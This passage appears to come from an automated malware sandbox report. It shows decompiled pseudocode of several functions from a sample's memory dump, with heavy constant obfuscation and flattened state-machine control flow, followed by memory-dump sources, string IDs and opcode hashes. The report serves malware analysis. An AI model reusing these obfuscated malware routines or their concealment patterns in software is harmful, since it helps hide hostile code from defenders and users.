				_v64 = _v64 + 0xfffff13c;
				_v64 = _v64 << 8;
				_v64 = _v64 ^ 0x00321441;
				_v68 = 0x6862;
				_v68 = _v68 + 0x864e;
				_v68 = _v68 << 3;
				_v68 = _v68 ^ 0x0007582b;
				_v92 = 0x5758;
				_v92 = _v92 | 0xff7df76f;
				_t251 = 0x39;
				_v92 = _v92 / _t251;
				_v92 = _v92 ^ 0x047b2a85;
				_v96 = 0x40be;
				_v96 = _v96 | 0xd59932a3;
				_v96 = _v96 << 0xb;
				_v96 = _v96 * 0x52;
				_v96 = _v96 ^ 0x36096eff;
				_v72 = 0x18a0;
				_v72 = _v72 + 0x45e5;
				_v72 = _v72 + 0xffff9352;
				_v72 = _v72 ^ 0xffff81db;
				_v100 = 0x6e96;
				_v100 = _v100 * 0x3a;
				_v100 = _v100 << 0x10;
				_v100 = _v100 ^ 0x7246fe44;
				_v100 = _v100 ^ 0x7fbac885;
				_v104 = 0x65cf;
				_v104 = _v104 / _t251;
				_v104 = _v104 ^ 0xf75b4ca1;
				_t252 = 0x48;
				_v104 = _v104 / _t252;
				_v104 = _v104 ^ 0x036f7b06;
				_v76 = 0x2c53;
				_t253 = 0x57;
				_v76 = _v76 * 0x11;
				_v76 = _v76 ^ 0x6f057687;
				_v76 = _v76 ^ 0x6f07c581;
				_v24 = 0x7097;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x000060b2;
				_v36 = 0x9151;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x43d947ca;
				_v36 = _v36 ^ 0xd2881410;
				_v40 = 0x482c;
				_v40 = _v40 + 0xffffb888;
				_v40 = _v40 << 1;
				_v40 = _v40 ^ 0x00000914;
				_v44 = 0x389f;
				_v44 = _v44 * 0x76;
				_v44 = _v44 * 0x18;
				_v44 = _v44 ^ 0x02723fe4;
				_v32 = 0x2aa8;
				_v32 = _v32 * 0x38;
				_v32 = _v32 ^ 0x551469c6;
				_v32 = _v32 ^ 0x551d1a3f;
				_v20 = 0xfc56;
				_v20 = _v20 / _t253;
				_v20 = _v20 ^ 0x000001b5;
				goto L1;
				do {
					while(1) {
						L1:
						_t277 = _t272 - 0x17308d28;
						if(_t277 > 0) {
							break;
						}
						if(_t277 == 0) {
							_push(_t253);
							_t236 = E00247F1B();
							_t274 =  &(_t274[1]);
							_t272 = 0x2b65fd67;
							_t271 = _t271 + _t236;
							continue;
						} else {
							if(_t272 == 0x285a15) {
								_t272 = 0x27256339;
								continue;
							} else {
								if(_t272 == 0x30e9834) {
									_t253 = _v72;
									_t238 = E0023D64E(_t253, _v100, _v104, _t247 + 0x18, _v76);
									_t274 =  &(_t274[3]);
									_t272 = 0x1bffcccd;
									_t271 = _t271 + _t238;
									continue;
								} else {
									if(_t272 == 0x527ec93) {
										_push(_t253);
										_t241 = E00247F1B();
										_t274 =  &(_t274[1]);
										_t272 = 0x1cfcffb7;
										_t271 = _t271 + _t241;
										continue;
									} else {
										if(_t272 != 0x60183f8) {
											goto L21;
										} else {
											_push(_v32);
											_t271 = _t271 + E00247F1B();
										}
									}
								}
							}
						}
						L8:
						return _t271;
					}
					if(_t272 == 0x1bffcccd) {
						_t253 = _v24;
						_t229 = E0023D64E(_t253, _v36, _v40, _t247 + 0x20, _v44);
						_t274 =  &(_t274[3]);
						_t272 = 0x60183f8;
						_t271 = _t271 + _t229;
						goto L21;
					} else {
						if(_t272 == 0x1cfcffb7) {
							_push(_t253);
							_t232 = E00247F1B();
							_t274 =  &(_t274[1]);
							_t272 = 0x17308d28;
							_t271 = _t271 + _t232;
							goto L1;
						} else {
							if(_t272 == 0x27256339) {
								_t253 = _v52;
								_t233 = E0023D64E(_t253, _v56, _v60, _t247, _v88);
								_t274 =  &(_t274[3]);
								_t272 = 0x527ec93;
								_t271 = _t271 + _t233;
								goto L1;
							} else {
								if(_t272 != 0x2b65fd67) {
									goto L21;
								} else {
									_push(_t253);
									_t246 = E00247F1B();
									_t274 =  &(_t274[1]);
									_t272 = 0x30e9834;
									_t271 = _t271 + _t246;
									goto L1;
								}
							}
						}
					}
					goto L8;
					L21:
				} while (_t272 != 0x28759a70);
				goto L8;
			}














































                                                      0x00247f1f
                                                      0x00247f22
                                                      0x00247f2c
                                                      0x00247f34
                                                      0x00247f40
                                                      0x00247f42
                                                      0x00247f44
                                                      0x00247f48
                                                      0x00247f4d
                                                      0x00247f55
                                                      0x00247f60
                                                      0x00247f65
                                                      0x00247f6b
                                                      0x00247f73
                                                      0x00247f7b
                                                      0x00247f83
                                                      0x00247f8b
                                                      0x00247f93
                                                      0x00247f9b
                                                      0x00247fa0
                                                      0x00247fa8
                                                      0x00247fb0
                                                      0x00247fb8
                                                      0x00247fbd
                                                      0x00247fc7
                                                      0x00247fca
                                                      0x00247fce
                                                      0x00247fd6
                                                      0x00247fe6
                                                      0x00247fea
                                                      0x00247ff2
                                                      0x00247ffa
                                                      0x00248002
                                                      0x0024800a
                                                      0x00248012
                                                      0x0024801a
                                                      0x00248022
                                                      0x0024802a
                                                      0x00248032
                                                      0x0024803a
                                                      0x00248042
                                                      0x0024804a
                                                      0x00248052
                                                      0x0024805a
                                                      0x00248062
                                                      0x00248067
                                                      0x0024806f
                                                      0x00248077
                                                      0x0024807f
                                                      0x00248084
                                                      0x0024808c
                                                      0x00248094
                                                      0x002480a0
                                                      0x002480a3
                                                      0x002480a7
                                                      0x002480af
                                                      0x002480b7
                                                      0x002480bf
                                                      0x002480c9
                                                      0x002480cd
                                                      0x002480d5
                                                      0x002480dd
                                                      0x002480e5
                                                      0x002480ed
                                                      0x002480f5
                                                      0x0024810b
                                                      0x0024810f
                                                      0x00248114
                                                      0x0024811c
                                                      0x00248124
                                                      0x00248134
                                                      0x00248138
                                                      0x00248144
                                                      0x00248149
                                                      0x0024814f
                                                      0x00248157
                                                      0x00248164
                                                      0x00248165
                                                      0x00248169
                                                      0x00248171
                                                      0x00248179
                                                      0x00248181
                                                      0x00248186
                                                      0x0024818e
                                                      0x00248196
                                                      0x0024819b
                                                      0x002481a3
                                                      0x002481ab
                                                      0x002481b3
                                                      0x002481bb
                                                      0x002481bf
                                                      0x002481c7
                                                      0x002481d4
                                                      0x002481dd
                                                      0x002481e1
                                                      0x002481e9
                                                      0x002481f6
                                                      0x002481fa
                                                      0x00248202
                                                      0x0024820a
                                                      0x00248218
                                                      0x0024821c
                                                      0x0024821c
                                                      0x00248224
                                                      0x00248224
                                                      0x00248224
                                                      0x00248224
                                                      0x00248226
                                                      0x00000000
                                                      0x00000000
                                                      0x0024822c
                                                      0x002482c7
                                                      0x002482c8
                                                      0x002482cd
                                                      0x002482d0
                                                      0x002482d5
                                                      0x00000000
                                                      0x00248232
                                                      0x00248238
                                                      0x002482b5
                                                      0x00000000
                                                      0x0024823a
                                                      0x00248240
                                                      0x0024829d
                                                      0x002482a1
                                                      0x002482a6
                                                      0x002482a9
                                                      0x002482ae
                                                      0x00000000
                                                      0x00248242
                                                      0x00248248
                                                      0x0024827b
                                                      0x0024827c
                                                      0x00248281
                                                      0x00248284
                                                      0x00248289
                                                      0x00000000
                                                      0x0024824a
                                                      0x00248250
                                                      0x00000000
                                                      0x00248256
                                                      0x0024825e
                                                      0x00248267
                                                      0x00248267
                                                      0x00248250
                                                      0x00248248
                                                      0x00248240
                                                      0x00248238
                                                      0x00248269
                                                      0x00248272
                                                      0x00248272
                                                      0x002482e2
                                                      0x00248368
                                                      0x0024836c
                                                      0x00248371
                                                      0x00248374
                                                      0x00248379
                                                      0x00000000
                                                      0x002482e4
                                                      0x002482ea
                                                      0x00248346
                                                      0x00248347
                                                      0x0024834c
                                                      0x0024834f
                                                      0x00248351
                                                      0x00000000
                                                      0x002482ec
                                                      0x002482f2
                                                      0x00248326
                                                      0x0024832a
                                                      0x0024832f
                                                      0x00248332
                                                      0x00248337
                                                      0x00000000
                                                      0x002482f4
                                                      0x002482fa
                                                      0x00000000
                                                      0x002482fc
                                                      0x00248304
                                                      0x00248305
                                                      0x0024830a
                                                      0x0024830d
                                                      0x00248312
                                                      0x00000000
                                                      0x00248312
                                                      0x002482fa
                                                      0x002482f2
                                                      0x002482ea
                                                      0x00000000
                                                      0x0024837b
                                                      0x0024837b
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,H$9c%'$9c%'$S,$XW$bh$~
                                                      • API String ID: 0-4263808623
                                                      • Opcode ID: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
                                                      • Instruction ID: a9f81e8d668acd391d52818b89eb62460bb7722323642bd61be0ee2dc6d5c687
                                                      • Opcode Fuzzy Hash: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
                                                      • Instruction Fuzzy Hash: 06B131B29283818FD358CF25D98A40FFBE1BB84748F048A1DF59696260DBB5D909CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002369A0, Relevance: 9.0, Strings: 7, Instructions: 215COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E002369A0(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* __edi;
				void* __ebp;
				void* _t182;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t191;
				intOrPtr _t192;
				intOrPtr* _t193;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t198;
				void* _t199;
				void* _t218;
				intOrPtr _t222;
				void* _t223;
				intOrPtr _t227;
				signed int* _t228;

				_t228 =  &_v84;
				_v8 = 0x71163c;
				_t222 = 0;
				_t193 = __edx;
				_v4 = 0;
				_v44 = 0xc562;
				_t227 = __ecx;
				_v44 = _v44 >> 2;
				_t223 = 0xa9ba57f;
				_v44 = _v44 ^ 0x8749252f;
				_v44 = _v44 ^ 0x87491d9f;
				_v16 = 0x2187;
				_v16 = _v16 + 0x9003;
				_v16 = _v16 ^ 0x00009583;
				_v64 = 0x884c;
				_v64 = _v64 ^ 0x157bb051;
				_t195 = 0x5b;
				_v64 = _v64 / _t195;
				_v64 = _v64 + 0xffffc6fd;
				_v64 = _v64 ^ 0x003c6beb;
				_v76 = 0xc2af;
				_t196 = 0x62;
				_v76 = _v76 / _t196;
				_v76 = _v76 << 0xb;
				_v76 = _v76 + 0xffffe747;
				_v76 = _v76 ^ 0x000fbc5b;
				_v20 = 0xd86f;
				_v20 = _v20 << 0xb;
				_v20 = _v20 ^ 0x06c32379;
				_v24 = 0x5847;
				_v24 = _v24 ^ 0xbe016602;
				_v24 = _v24 ^ 0xbe0159ab;
				_v56 = 0x8b9e;
				_v56 = _v56 << 8;
				_v56 = _v56 ^ 0x62eb1469;
				_v56 = _v56 ^ 0x62609790;
				_v60 = 0xc8f5;
				_v60 = _v60 | 0xe944ef36;
				_v60 = _v60 ^ 0xbc6be2e2;
				_v60 = _v60 ^ 0x552f2627;
				_v84 = 0x43ed;
				_v84 = _v84 ^ 0x08a0b069;
				_v84 = _v84 | 0x0c951c83;
				_v84 = _v84 + 0x562e;
				_v84 = _v84 ^ 0x0cb6752c;
				_v48 = 0x4b81;
				_v48 = _v48 >> 0xc;
				_v48 = _v48 + 0xffff2892;
				_v48 = _v48 ^ 0xffff31fe;
				_v80 = 0x3016;
				_v80 = _v80 + 0x7dde;
				_v80 = _v80 << 0xf;
				_t197 = 0x36;
				_v80 = _v80 / _t197;
				_v80 = _v80 ^ 0x019c7f33;
				_v52 = 0xfd2;
				_v52 = _v52 + 0xffff2d18;
				_v52 = _v52 + 0x6a3f;
				_v52 = _v52 ^ 0xffffabb5;
				_v28 = 0xa77b;
				_v28 = _v28 ^ 0xae749dbd;
				_v28 = _v28 ^ 0xae743f32;
				_v32 = 0xf75f;
				_v32 = _v32 | 0x58371397;
				_v32 = _v32 ^ 0x5837ee79;
				_v68 = 0x3d22;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 << 0xf;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x00007889;
				_v72 = 0xcbcf;
				_v72 = _v72 | 0x3a65856e;
				_v72 = _v72 + 0xdb4;
				_v72 = _v72 | 0x1789f940;
				_v72 = _v72 ^ 0x3feda3a8;
				_v36 = 0x2389;
				_v36 = _v36 * 0x4b;
				_v36 = _v36 | 0x61940fa3;
				_v36 = _v36 ^ 0x619e1b1f;
				_v40 = 0xa903;
				_v40 = _v40 + 0x4cf2;
				_v40 = _v40 | 0xc82713d6;
				_v40 = _v40 ^ 0xc827b671;
				_v12 = 0xc1c;
				_v12 = _v12 ^ 0x8bcf36f0;
				_v12 = _v12 ^ 0x8bcf5121;
				while(1) {
					L1:
					_t198 = 0x374e1c43;
					_t182 = 0x15aea868;
					L2:
					while(1) {
						do {
							if(_t223 == 0xa9ba57f) {
								_push(_t198);
								_push(_t198);
								_t199 = 0x38;
								_t222 = E00238736(_t199);
								__eflags = _t222;
								if(__eflags == 0) {
									_t223 = 0x3a1f14a3;
									_t182 = 0x15aea868;
									_t198 = 0x374e1c43;
									_t218 = 0x28fd42b4;
									goto L19;
								}
								_t223 = 0x2094e6da;
								L15:
								_t182 = 0x15aea868;
								L11:
								_t198 = 0x374e1c43;
								L12:
								_t218 = 0x28fd42b4;
								continue;
							}
							if(_t223 == 0xb1cacb5) {
								return E0023F536(_v36, _v40, _v12, _t222);
							}
							if(_t223 == _t182) {
								 *((intOrPtr*)(_t222 + 0x24)) = _t227;
								_t188 =  *0x24ca24; // 0x0
								 *((intOrPtr*)(_t222 + 0x2c)) = _t188;
								 *0x24ca24 = _t222;
								return _t188;
							}
							if(_t223 == 0x16c9d000) {
								E0024422C(_v68,  *((intOrPtr*)(_t222 + 0x28)), _v72);
								_t223 = 0xb1cacb5;
								goto L15;
							}
							if(_t223 == 0x2094e6da) {
								_push(_v24);
								_t190 = E00246DB9( *((intOrPtr*)(_t193 + 4)), _t222, _t227, __eflags, _t198,  *_t193, _v76, _v20);
								_t228 =  &(_t228[5]);
								 *((intOrPtr*)(_t222 + 0x28)) = _t190;
								__eflags = _t190;
								_t198 = 0x374e1c43;
								_t182 = 0x15aea868;
								_t223 =  !=  ? 0x374e1c43 : 0xb1cacb5;
								goto L12;
							}
							if(_t223 == _t218) {
								_push(_t198);
								_t191 = E00231132(_v48, _t198, _v80, _t198, _t222, _v52, _v28, _v32, E00249586);
								_t228 =  &(_t228[9]);
								 *((intOrPtr*)(_t222 + 0x1c)) = _t191;
								__eflags = _t191;
								_t182 = 0x15aea868;
								_t223 =  !=  ? 0x15aea868 : 0x16c9d000;
								goto L11;
							}
							if(_t223 != _t198) {
								goto L19;
							}
							_t192 = E002376DB( *((intOrPtr*)(_t222 + 0x28)), _v56, _v60, _v84);
							_t228 =  &(_t228[2]);
							 *((intOrPtr*)(_t222 + 4)) = _t192;
							_t218 = 0x28fd42b4;
							_t223 =  !=  ? 0x28fd42b4 : 0x16c9d000;
							goto L1;
							L19:
							__eflags = _t223 - 0x3a1f14a3;
						} while (__eflags != 0);
						return _t182;
					}
				}
			}










































                                                      0x002369a0
                                                      0x002369a3
                                                      0x002369af
                                                      0x002369b1
                                                      0x002369b3
                                                      0x002369b9
                                                      0x002369c1
                                                      0x002369c3
                                                      0x002369c8
                                                      0x002369cd
                                                      0x002369d5
                                                      0x002369dd
                                                      0x002369e5
                                                      0x002369ed
                                                      0x002369f5
                                                      0x002369fd
                                                      0x00236a0b
                                                      0x00236a10
                                                      0x00236a16
                                                      0x00236a1e
                                                      0x00236a26
                                                      0x00236a32
                                                      0x00236a37
                                                      0x00236a3d
                                                      0x00236a42
                                                      0x00236a4a
                                                      0x00236a52
                                                      0x00236a5a
                                                      0x00236a5f
                                                      0x00236a67
                                                      0x00236a6f
                                                      0x00236a77
                                                      0x00236a7f
                                                      0x00236a87
                                                      0x00236a8c
                                                      0x00236a94
                                                      0x00236a9c
                                                      0x00236aa4
                                                      0x00236aac
                                                      0x00236ab4
                                                      0x00236abc
                                                      0x00236ac4
                                                      0x00236acc
                                                      0x00236ad4
                                                      0x00236adc
                                                      0x00236ae4
                                                      0x00236aec
                                                      0x00236af1
                                                      0x00236af9
                                                      0x00236b01
                                                      0x00236b09
                                                      0x00236b11
                                                      0x00236b1a
                                                      0x00236b1d
                                                      0x00236b21
                                                      0x00236b29
                                                      0x00236b31
                                                      0x00236b39
                                                      0x00236b41
                                                      0x00236b49
                                                      0x00236b51
                                                      0x00236b59
                                                      0x00236b61
                                                      0x00236b69
                                                      0x00236b71
                                                      0x00236b79
                                                      0x00236b81
                                                      0x00236b8b
                                                      0x00236b90
                                                      0x00236b95
                                                      0x00236b9d
                                                      0x00236ba5
                                                      0x00236bad
                                                      0x00236bb5
                                                      0x00236bbd
                                                      0x00236bc5
                                                      0x00236bd2
                                                      0x00236bd6
                                                      0x00236bde
                                                      0x00236be6
                                                      0x00236bee
                                                      0x00236bf6
                                                      0x00236bfe
                                                      0x00236c06
                                                      0x00236c0e
                                                      0x00236c16
                                                      0x00236c1e
                                                      0x00236c1e
                                                      0x00236c1e
                                                      0x00236c23
                                                      0x00000000
                                                      0x00236c28
                                                      0x00236c28
                                                      0x00236c2e
                                                      0x00236d35
                                                      0x00236d36
                                                      0x00236d39
                                                      0x00236d3f
                                                      0x00236d43
                                                      0x00236d45
                                                      0x00236d4e
                                                      0x00236d53
                                                      0x00236d58
                                                      0x00236d5d
                                                      0x00000000
                                                      0x00236d5d
                                                      0x00236d47
                                                      0x00236d22
                                                      0x00236d22
                                                      0x00236cca
                                                      0x00236cca
                                                      0x00236ccf
                                                      0x00236ccf
                                                      0x00000000
                                                      0x00236ccf
                                                      0x00236c3a
                                                      0x00000000
                                                      0x00236d96
                                                      0x00236c42
                                                      0x00236d70
                                                      0x00236d73
                                                      0x00236d78
                                                      0x00236d7b
                                                      0x00000000
                                                      0x00236d7b
                                                      0x00236c4e
                                                      0x00236d17
                                                      0x00236d1d
                                                      0x00000000
                                                      0x00236d1d
                                                      0x00236c5a
                                                      0x00236cd9
                                                      0x00236ceb
                                                      0x00236cf0
                                                      0x00236cf3
                                                      0x00236cf6
                                                      0x00236cfd
                                                      0x00236d02
                                                      0x00236d07
                                                      0x00000000
                                                      0x00236d07
                                                      0x00236c5e
                                                      0x00236c93
                                                      0x00236cb0
                                                      0x00236cb5
                                                      0x00236cb8
                                                      0x00236cbb
                                                      0x00236cc2
                                                      0x00236cc7
                                                      0x00000000
                                                      0x00236cc7
                                                      0x00236c62
                                                      0x00000000
                                                      0x00000000
                                                      0x00236c77
                                                      0x00236c7c
                                                      0x00236c7f
                                                      0x00236c89
                                                      0x00236c8e
                                                      0x00000000
                                                      0x00236d62
                                                      0x00236d62
                                                      0x00236d62
                                                      0x00000000
                                                      0x00236c28
                                                      0x00236c28

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "=$'&/U$.V$?j$GX$y7X$k<
                                                      • API String ID: 0-2482092835
                                                      • Opcode ID: ca5628ad3bb111046fd6c74fa9a90bf973a19b33518606bf6bcf2b320ef3f076
                                                      • Instruction ID: 432e12e82c7949babc6f175744fb818aabc46917c1141e8a05bf98bf4cf31fd7
                                                      • Opcode Fuzzy Hash: ca5628ad3bb111046fd6c74fa9a90bf973a19b33518606bf6bcf2b320ef3f076
                                                      • Instruction Fuzzy Hash: E8A174B2528341AFD358CF25C58A40BFBE1FBD4754F508A1DF48A96260D7B5C919CF82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00231280, Relevance: 7.7, Strings: 6, Instructions: 157COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 92%
                                                      			E00231280(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t124;
				void* _t136;
				void* _t143;
				signed int _t144;
				signed int _t145;
				signed int _t146;
				void* _t149;
				void* _t170;
				void* _t172;
				void* _t173;

				_push(_a16);
				_t169 = _a8;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t124);
				_v112 = 0x527a;
				_t173 = _t172 + 0x18;
				_v112 = _v112 + 0x9ab3;
				_t170 = 0;
				_t149 = 0x18640a1d;
				_t144 = 0x56;
				_v112 = _v112 * 0x2c;
				_v112 = _v112 ^ 0x0028d5a0;
				_v84 = 0xce56;
				_v84 = _v84 | 0x89224a79;
				_v84 = _v84 ^ 0x8922db02;
				_v124 = 0x8cd1;
				_v124 = _v124 ^ 0x879587c2;
				_v124 = _v124 | 0xdff4f7f6;
				_v124 = _v124 ^ 0xdff58592;
				_v80 = 0x5082;
				_v80 = _v80 * 5;
				_v80 = _v80 ^ 0x0001dd7a;
				_v100 = 0x94cc;
				_v100 = _v100 >> 1;
				_v100 = _v100 + 0xc5d3;
				_v100 = _v100 ^ 0x0001674a;
				_v104 = 0x7528;
				_v104 = _v104 | 0x4afc80c9;
				_v104 = _v104 * 0x41;
				_v104 = _v104 ^ 0x0a3a6635;
				_v108 = 0x5a30;
				_v108 = _v108 >> 6;
				_t145 = 0x51;
				_v108 = _v108 / _t144;
				_v108 = _v108 ^ 0x00000b43;
				_v128 = 0x7a75;
				_v128 = _v128 ^ 0x183e3e2b;
				_v128 = _v128 >> 0xe;
				_v128 = _v128 << 1;
				_v128 = _v128 ^ 0x0000b567;
				_v88 = 0xd0b6;
				_v88 = _v88 << 2;
				_v88 = _v88 ^ 0x0003606d;
				_v92 = 0x29e5;
				_v92 = _v92 << 0x10;
				_v92 = _v92 ^ 0x29e559c0;
				_v116 = 0xa20c;
				_v116 = _v116 / _t145;
				_v116 = _v116 << 1;
				_v116 = _v116 ^ 0x00003b63;
				_v120 = 0xbe93;
				_v120 = _v120 | 0x1a4ed6db;
				_v120 = _v120 + 0xa009;
				_v120 = _v120 + 0xfffff07c;
				_v120 = _v120 ^ 0x1a4feb5f;
				_v96 = 0x4975;
				_t146 = 0x2b;
				_v96 = _v96 * 0x31;
				_v96 = _v96 / _t146;
				_v96 = _v96 ^ 0x000025f7;
				do {
					while(_t149 != 0x1a9c3b7) {
						if(_t149 == 0xb87d72f) {
							__eflags = E0023B055(_v120, _v96, __eflags,  &_v76, _t169 + 8);
							_t170 =  !=  ? 1 : _t170;
						} else {
							if(_t149 == 0x18640a1d) {
								_t149 = 0x1a19e858;
								continue;
							} else {
								if(_t149 == 0x1a19e858) {
									E002450F2( &_v76, _v112, _v84, _v124, _a12);
									_t173 = _t173 + 0xc;
									_t149 = 0x1a9c3b7;
									continue;
								} else {
									if(_t149 != 0x2b3c78b1) {
										goto L13;
									} else {
										_t143 = E00248F11( &_v76, _v128, _v88, _t169 + 4, _v92, _v116);
										_t173 = _t173 + 0x10;
										if(_t143 != 0) {
											_t149 = 0xb87d72f;
											continue;
										}
									}
								}
							}
						}
						L16:
						return _t170;
					}
					_t136 = E00248F11( &_v76, _v80, _v100, _t169, _v104, _v108);
					_t173 = _t173 + 0x10;
					__eflags = _t136;
					if(__eflags == 0) {
						_t149 = 0x1a747795;
						goto L13;
					} else {
						_t149 = 0x2b3c78b1;
						continue;
					}
					goto L16;
					L13:
					__eflags = _t149 - 0x1a747795;
				} while (__eflags != 0);
				goto L16;
			}



























                                                      0x0023128a
                                                      0x00231291
                                                      0x00231298
                                                      0x0023129f
                                                      0x002312a0
                                                      0x002312a7
                                                      0x002312a8
                                                      0x002312a9
                                                      0x002312ae
                                                      0x002312b6
                                                      0x002312b9
                                                      0x002312c8
                                                      0x002312ca
                                                      0x002312d1
                                                      0x002312d4
                                                      0x002312d8
                                                      0x002312e0
                                                      0x002312e8
                                                      0x002312f0
                                                      0x002312f8
                                                      0x00231300
                                                      0x00231308
                                                      0x00231310
                                                      0x00231318
                                                      0x00231325
                                                      0x00231329
                                                      0x00231331
                                                      0x00231339
                                                      0x0023133d
                                                      0x00231345
                                                      0x0023134d
                                                      0x00231355
                                                      0x00231362
                                                      0x00231366
                                                      0x0023136e
                                                      0x00231376
                                                      0x00231381
                                                      0x00231382
                                                      0x00231388
                                                      0x00231390
                                                      0x00231398
                                                      0x002313a0
                                                      0x002313a5
                                                      0x002313a9
                                                      0x002313b1
                                                      0x002313b9
                                                      0x002313be
                                                      0x002313c6
                                                      0x002313ce
                                                      0x002313d3
                                                      0x002313db
                                                      0x002313eb
                                                      0x002313ef
                                                      0x002313f3
                                                      0x002313fb
                                                      0x00231403
                                                      0x0023140b
                                                      0x00231413
                                                      0x0023141b
                                                      0x00231423
                                                      0x00231432
                                                      0x00231433
                                                      0x00231447
                                                      0x0023144b
                                                      0x00231453
                                                      0x00231453
                                                      0x0023145d
                                                      0x0023152a
                                                      0x0023152c
                                                      0x00231463
                                                      0x00231469
                                                      0x002314cd
                                                      0x00000000
                                                      0x0023146b
                                                      0x0023146d
                                                      0x002314be
                                                      0x002314c3
                                                      0x002314c6
                                                      0x00000000
                                                      0x0023146f
                                                      0x00231475
                                                      0x00000000
                                                      0x0023147b
                                                      0x00231493
                                                      0x00231498
                                                      0x0023149d
                                                      0x002314a3
                                                      0x00000000
                                                      0x002314a3
                                                      0x0023149d
                                                      0x00231475
                                                      0x0023146d
                                                      0x00231469
                                                      0x00231530
                                                      0x0023153b
                                                      0x0023153b
                                                      0x002314e6
                                                      0x002314eb
                                                      0x002314ee
                                                      0x002314f0
                                                      0x002314fc
                                                      0x00000000
                                                      0x002314f2
                                                      0x002314f2
                                                      0x00000000
                                                      0x002314f2
                                                      0x00000000
                                                      0x00231501
                                                      0x00231501
                                                      0x00231501
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0Z$5f:$c;$uI$uz$zR
                                                      • API String ID: 0-4070947617
                                                      • Opcode ID: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
                                                      • Instruction ID: 14e3f2a68fbbba4ff3f09a31d1960bb7da5a8a6a525d4934ed443a0206307409
                                                      • Opcode Fuzzy Hash: 763ded3f5558a66bbb923cfeb9a3956aa5b31dcbf45d9db1e7361bf3c87cd045
                                                      • Instruction Fuzzy Hash: AB6156B1119341AFD758CF20C98591FBBE1FBC9748F80991DF296861A0D7B9CA188F43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002317AC, Relevance: 7.7, Strings: 6, Instructions: 157COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E002317AC(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				void* __ecx;
				void* _t124;
				intOrPtr _t144;
				void* _t148;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t172;
				signed int* _t175;

				_push(_a20);
				_push(1);
				_push(1);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0023602B(_t124);
				_v48 = 0x839b;
				_t175 =  &(( &_v52)[7]);
				_t172 = 0;
				_t148 = 0xc9f1fee;
				_t167 = 0x65;
				_v48 = _v48 / _t167;
				_v48 = _v48 + 0xffff5433;
				_t168 = 0x4c;
				_v48 = _v48 / _t168;
				_v48 = _v48 ^ 0x035e614e;
				_v52 = 0x7a24;
				_t169 = 0x57;
				_v52 = _v52 * 0x3d;
				_v52 = _v52 / _t169;
				_v52 = _v52 | 0x143fc393;
				_v52 = _v52 ^ 0x143ff5ea;
				_v32 = 0x6195;
				_v32 = _v32 ^ 0x160f1dee;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x2c1ed936;
				_v44 = 0xc7f4;
				_v44 = _v44 + 0xffff31e5;
				_v44 = _v44 | 0xcdfc86d8;
				_v44 = _v44 + 0xffff4cbe;
				_v44 = _v44 ^ 0xffff1878;
				_v12 = 0x3e0d;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0x0003ab13;
				_v24 = 0xe2a2;
				_t170 = 0x4a;
				_v24 = _v24 * 0x7d;
				_v24 = _v24 >> 4;
